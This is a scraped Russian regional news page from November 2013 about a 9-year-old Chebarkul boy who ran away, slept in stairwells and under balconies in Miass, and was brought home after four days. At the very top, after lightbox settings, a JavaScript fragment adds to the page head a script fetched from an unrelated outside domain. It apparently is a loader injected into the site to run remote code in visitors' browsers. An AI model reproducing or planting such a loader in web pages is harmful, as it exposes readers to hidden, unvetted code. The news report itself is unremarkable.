, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Пропавший в Чебаркуле мальчик был найден в Миассе

9-летнего Владислава Калашникова нашла неизвестная женщина и на такси привезла к родителям в Чебаркуль. Все это время ребенок школьник ночевал  в подъездах и под балконами домов в соседнем городе Миассе.

Как уже сообщал портал “Настоящие новости Челябинска”, с заявлением о пропаже ребенка в полицию обратился отец. По его словам, 5 ноября мальчик ушел в школу и домой не вернулся. Как выяснилось, школьник не в первый раз сбегает из дома, но ранее отец всегда сам находил сына, гулявшего в соседних населенных пунктах.

На розыск несовершеннолетнего были направлены все силы чебаркульской полиции. Стажи порядка создали 8 поисковых групп и провели широкое информирование в средствах массовой информации всей Челябинской области о розыске пропавшего. Параллельно проводилась работа с друзьями и одноклассниками ребенка, проверялись возможные места его пребывания: чердаки, подвалы, садовые товарищества.

Найти беглеца удалось лишь спустя четверо суток после пропажи. Домой Владислава привезла женщина из Миасса, которая обнаружила его спящим на старом диване во дворе своего дома. Правоохранительным органам мальчик рассказал, что 5 ноября допоздна заигрался с друзьями и побоялся возвращаться домой. Переночевав под балконом, на следующий день школьник узнал, что его разыскивают, и пешком отправился в соседний Миасс. До города беглеца подкинул неизвестный автомобилист. Там Влад провел  несколько суток, ночуя в подъездах и под балконами домов.

По сведениям правоохранительных органов, семья мальчика характеризуется как благополучная, в школе беглец также имеет положительную характеристику. Сотрудники отдела по делам несовершеннолетних чебаркульской полиции провели профилактическую беседу с ребенком. Владислав пообещал, что больше так поступать никогда не будет. Тем не менее, информация о семье передана  в органы социальной защиты.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:58 - 09 ноября 2013
|
автор: U-RSS
|
(1 687)
|
(0)

Комментарии (0)

Я человек
Я бот